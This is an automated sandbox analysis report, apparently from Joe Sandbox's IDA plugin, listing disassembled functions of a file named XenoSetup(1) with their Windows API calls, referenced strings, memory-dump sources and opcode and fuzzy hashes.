Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 31dd244bc0fb3eb33e873f0fb3b701ac19a5a73f8301df854130bb97b1743a36
Instruction ID: 27b2cf7b119c8031409fc121138a6af33c0421db475b9909d5a8f87fa0f39ed0
Opcode Fuzzy Hash: 31dd244bc0fb3eb33e873f0fb3b701ac19a5a73f8301df854130bb97b1743a36
Instruction Fuzzy Hash: 4611D3B2644218AFD3218FA9ED85F7E7769EF4A742F000100F384DB4B4C776B845A726

Function 00FED8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00FED954
_strncpy.LIBCMT ref: 00FED99A

Part of subcall function 00FF1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01021030,00000200,00FED928,00000000,?,00000050,01021030), ref: 00FF1DC4

Strings

@%s, xrefs: 00FED93E
$%s, xrefs: 00FED949

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 3fe3f5ff086f3f804decc8fa5f2e511ee01f1415d7db2021a3f03f83876c060e
Instruction ID: 0e905154f4eb4b0b95c5a1b09fca193b3c75596347556a159706860d1ff3a906
Opcode Fuzzy Hash: 3fe3f5ff086f3f804decc8fa5f2e511ee01f1415d7db2021a3f03f83876c060e
Instruction Fuzzy Hash: 7021933284028CEEEB21DEA5CC45FDE7BA8BF05310F040126F9549A5A3E676D658EB51

Function 00FF0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00FEAC5A,00000008,?,00000000,?,00FED22D,?,00000000), ref: 00FF0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00FEAC5A,00000008,?,00000000,?,00FED22D,?,00000000), ref: 00FF0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00FEAC5A,00000008,?,00000000,?,00FED22D,?,00000000), ref: 00FF0E9F

Strings

Thread pool initialization failed., xrefs: 00FF0EB7

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: b2dececabce5c45a73f32fd4ea1afab017b9067f27dba11dcdf4fbbaaba019e3
Instruction ID: b3bc70f55c01bfd65c915dfe098b7e5a0c6aa53260e1e9d106d156cd6be68b13
Opcode Fuzzy Hash: b2dececabce5c45a73f32fd4ea1afab017b9067f27dba11dcdf4fbbaaba019e3
Instruction Fuzzy Hash: 0D118FB1A4070C9BC3315F6AD8849A7FBECEF64754F10482EF1DAC6211DAB559409B50

Function 00FFB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370

EndDialog.USER32(?,00000001), ref: 00FFB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00FFB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00FFB304

Strings

GETPASSWORD1, xrefs: 00FFB289

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: f68b528e0b26bfba16ba5612227a6d5b3fb08d6b4cf388cc10b9d81763c9c6d2
Instruction ID: c8405d126150ad7846ff8d178d27c2d5237a920ac3956b3824bc3146714b59e4
Opcode Fuzzy Hash: f68b528e0b26bfba16ba5612227a6d5b3fb08d6b4cf388cc10b9d81763c9c6d2
Instruction Fuzzy Hash: 5A114833A4011C7BDB229AA4DD49FFF372CFF49750F000020FB45B61A4C7A59904A760

Function 00FFDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00FFDD1C, 00FFDD50
RENAMEDLG, xrefs: 00FFDD31

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: dc3780027f3ae2845a59d5dd57bf1617004b4d0ff8f244d28664164db36bcc82
Instruction ID: 2f63620502e5b37f86f67c989a3570a363475655383aaa18fce40213d9a37560
Opcode Fuzzy Hash: dc3780027f3ae2845a59d5dd57bf1617004b4d0ff8f244d28664164db36bcc82
Instruction Fuzzy Hash: 1001B97AA0425CAFD7315E54FC44A6E3BE9FB55354B10402AFA85C3234C67A9850F7A0

Function 01009A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01009AA9
__alldvrm.LIBCMT ref: 01009CAA
__alldvrm.LIBCMT ref: 01009CCC

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: 83dcc9a34a201d7d72609f716728f99757084c7d711dbb805d920a12fae13af8
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 0BA11672D0468A9FFB138F18C891BAEBBE5EF55318F1841ADE5C99B2C2C6398941C750

Function 00FEA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00FE7F69,?,?,?), ref: 00FEA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00FE7F69,?), ref: 00FEA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00FE7F69,?,?,?,?,?,?,?), ref: 00FEA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00FE7F69,?,?,?,?,?,?,?,?,?,?), ref: 00FEA4C6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: c9e25ed7c3c898ee8afa81a6804b02f97d925b013c3a6b9e8e350735ea65e022
Instruction ID: 00a2e4a755d6733cfa080d1109bb964a71ffe807acfed35dfeedb85ed2ce71a2
Opcode Fuzzy Hash: c9e25ed7c3c898ee8afa81a6804b02f97d925b013c3a6b9e8e350735ea65e022
Instruction Fuzzy Hash: 7841DF316483C19ED731DE25DC45FAEBBE4AF80320F04491DB5E0971D0D6A9AA48EB53

Function 00FE1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FE112B
_wcslen.LIBCMT ref: 00FE1153
_wcslen.LIBCMT ref: 00FE1182
_wcslen.LIBCMT ref: 00FE11A9

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 6524edf3672cade140076445dd290b1d472dd3cf01e28115eff4934edc2c4a38
Instruction ID: 8c336064b8472bba3c03f5287935dfba8cd783dbc6923b1a0830a7a5147d9463
Opcode Fuzzy Hash: 6524edf3672cade140076445dd290b1d472dd3cf01e28115eff4934edc2c4a38
Instruction Fuzzy Hash: 5541E77190066A5BCB219F698C499EF7BB8FF00310F000119FE45FB245DF34AD548BA4

Function 0100C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,010091E0,?,00000000,?,00000001,?,?,00000001,010091E0,?), ref: 0100C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0100CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01006CBE,?), ref: 0100CA70
__freea.LIBCMT ref: 0100CA79

Part of subcall function 01008E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0100CA2C,00000000,?,01006CBE,?,00000008,?,010091E0,?,?,?), ref: 01008E38

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 807af844703635925789a1c03e8f58155a3488dd0fddc0153ee67b089d8fe4ed
Instruction ID: 5593644950d06ba352883f0198c20ea65ddd4bebbfdb31d369a7053a9fe36f09
Opcode Fuzzy Hash: 807af844703635925789a1c03e8f58155a3488dd0fddc0153ee67b089d8fe4ed
Instruction Fuzzy Hash: DD318F72A0021AABFB26DF68DC45DEE7BA5EF41214F0442A8FD44D6290E739D994CB90

Function 00FFA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FFA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00FFA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FFA683
ReleaseDC.USER32(00000000,00000000), ref: 00FFA691

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: bf23a90d0171a1db035c3f718e3a1005828a5c1bce5860379adebe3a0429325f
Instruction ID: ac4f7476a4bf9510a6aab3626bea41ea668c5f58a7227e31bb7c564dea540e5e
Opcode Fuzzy Hash: bf23a90d0171a1db035c3f718e3a1005828a5c1bce5860379adebe3a0429325f
Instruction Fuzzy Hash: 4DE08CB9942730A7C3305F60A95DB8A3E64BB15B52F105301FB859A188DBAE84008BA0

Function 00FFA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00FFA699: GetDC.USER32(00000000), ref: 00FFA69D
Part of subcall function 00FFA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FFA6A8
Part of subcall function 00FFA699: ReleaseDC.USER32(00000000,00000000), ref: 00FFA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00FFA83C

Part of subcall function 00FFAAC9: GetDC.USER32(00000000), ref: 00FFAAD2
Part of subcall function 00FFAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00FFAB01
Part of subcall function 00FFAAC9: ReleaseDC.USER32(00000000,?), ref: 00FFAB99

Strings

(, xrefs: 00FFA9AA

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 1f648da1463f78a94845e166111ba136f86c376cacbceb74a64f1add1f79f768
Instruction ID: ab2d109de64be1d5a14777fa3a00e4c357e61a26f683d5b808fa71a7fbe57381
Opcode Fuzzy Hash: 1f648da1463f78a94845e166111ba136f86c376cacbceb74a64f1add1f79f768
Instruction Fuzzy Hash: 709102B5604354AFD720DF25C884A6BBBE8FFC9710F00491EF59AD7220DB79A805CB62

Function 0100B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0100B324

Part of subcall function 01009097: IsProcessorFeaturePresent.KERNEL32(00000017,01009086,00000050,01013A34,?,00FED710,00000004,01021030,?,?,01009093,00000000,00000000,00000000,00000000,00000000), ref: 01009099
Part of subcall function 01009097: GetCurrentProcess.KERNEL32(C0000417,01013A34,00000050,01021030), ref: 010090BB
Part of subcall function 01009097: TerminateProcess.KERNEL32(00000000), ref: 010090C2

Strings

., xrefs: 0100B4DB
*?, xrefs: 0100B1FB

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 5e3b4a46c578d273bd442edc8e9b40f1a9140f2cc9f4ef23d4cb0a458425235a
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: CA516475E0010AAFEF16DFA8C8819EDBBF5FF58314F2481A9D994E7381E6359A01CB50

Function 00FE75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00FE75E3

Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0

Part of subcall function 00FEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00FEA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00FE777F

Part of subcall function 00FEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA501
Part of subcall function 00FEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA532

Strings

:, xrefs: 00FE7654

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: a8ed7d453a8e82c0e41e6a5ea52cd3e37e2b87923ce6f742ae0a3d539423d64c
Instruction ID: 7e3647f1ce5c407ec783e3abdcb1c488fee60a90a9ed83ca20845b8cf0bc3c0a
Opcode Fuzzy Hash: a8ed7d453a8e82c0e41e6a5ea52cd3e37e2b87923ce6f742ae0a3d539423d64c
Instruction Fuzzy Hash: 4B418271805298AAEB35EB66CC59EEEB77CAF41300F0440D6B605A7092DB785F84EF71

Function 00FFB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FFB4E3
_wcslen.LIBCMT ref: 00FFB4FE

Strings

}, xrefs: 00FFB4D6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: d11209feb10e2f39b04bd258b7dc1923f16d55493e66f32f232d14a02b9cf2ff
Instruction ID: 0bb05381ed62b88a08f8932544e3a08989011ac3f71f11eb1ce426c6f570e233
Opcode Fuzzy Hash: d11209feb10e2f39b04bd258b7dc1923f16d55493e66f32f232d14a02b9cf2ff
Instruction Fuzzy Hash: 0D21D472D0434E5AD732EA64DC44A7BB3DCDF50760F08042AF680C7165EB699D48A3A2

Function 00FEF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00FEF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00FEF2E4
Part of subcall function 00FEF2C5: GetProcAddress.KERNEL32(010281C8,CryptUnprotectMemory), ref: 00FEF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00FEF33E), ref: 00FEF3D2

Strings

CryptProtectMemory failed, xrefs: 00FEF389
CryptUnprotectMemory failed, xrefs: 00FEF3CA

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 7d45269a2b2877c111e7b6c7ae9f0c44cd7401528e1d9d3bdf2d2a46aa93e736
Instruction ID: f11b17530da078c1041766be47612517bc4f6ff787894a7c6739262bb94e8d67
Opcode Fuzzy Hash: 7d45269a2b2877c111e7b6c7ae9f0c44cd7401528e1d9d3bdf2d2a46aa93e736
Instruction Fuzzy Hash: 48115932A002A8AFDF21AF32DC41A6E3B58FF00770B208166FC855F285CA799C04A781

Function 00FEB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FEB9B8

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

Strings

%c:\, xrefs: 00FEB9AE

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 2f15faf472ac0c21fcdd700721f25b3037367252cc7b4dfee599ca4365cc9d51
Instruction ID: e2873d232dd7fe8c2bd9bcf2cf41b3dd15e0e85a862b060808aead17e7b6fc62
Opcode Fuzzy Hash: 2f15faf472ac0c21fcdd700721f25b3037367252cc7b4dfee599ca4365cc9d51
Instruction Fuzzy Hash: 2501F56390435279EA32AB778C45D6BB7ACEF91770F50452FF984D6082EB28D85092B1

Function 00FF101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00FF1160,?,00000000,00000000), ref: 00FF1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00FF108A

